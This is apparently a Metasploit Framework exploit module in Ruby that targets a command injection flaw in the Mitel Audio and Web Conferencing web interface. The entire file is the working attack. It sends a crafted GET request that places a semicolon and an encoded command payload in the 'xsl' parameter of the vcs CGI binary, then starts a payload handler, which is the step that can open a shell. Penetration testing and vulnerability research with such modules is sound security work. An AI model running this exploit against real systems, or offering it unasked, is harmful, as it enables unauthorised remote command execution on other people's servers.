### $Id: mitel_awc_exec.rb 11516 2011-01-08 01:13:26Z jduck $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info ={})
super(update_info(info,
'Name'=>'Mitel Audio and Web Conferencing Command Injection',
'Description'=> %q{
This module exploits a command injection flaw within the Mitel
Audio and Web Conferencing web interface.
},
'Author'=>['hdm'],
'License'=> MSF_LICENSE,
'Version'=>'$Revision: 11516 $',
'References'=>[['URL', 'http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-14'],
['OSVDB', '69934'],
# ['CVE', ''],# ['BID', '']],
'Platform'=>['unix', 'linux'],
'Arch'=> ARCH_CMD,
'Privileged'=> false,
'Payload'=>{'DisableNops'=> true,
'Space'=>1024,
'BadChars'=>"<>",
'Compat'=>{'PayloadType'=>'cmd',
'RequiredCmd'=>'generic perl ruby bash telnet',
}},
'Targets'=>[['Automatic', {}], ],
'DefaultTarget'=>0,
'DisclosureDate'=>'Dec 12 2010'))
register_options([
Opt::RPORT(80),
OptString.new('URIPATH', [ true,"The path to the vcs cgi-bin binary", "/awcuser/cgi-bin/vcs"])], self.class)
end
def exploit
print_status("Attempting to execute our command..")
res = send_request_cgi({'uri'=> datastore['URIPATH'],
'method'=>'GET',
'vars_get'=>{'xml'=>'withXsl',
'xsl'=>';' + payload.encoded
}}, 10)if res and res.code.to_i >200
print_error("Unexpected reply: #{res.code} #{res.body[0,500].inspect}...")return
end
handler
end
end
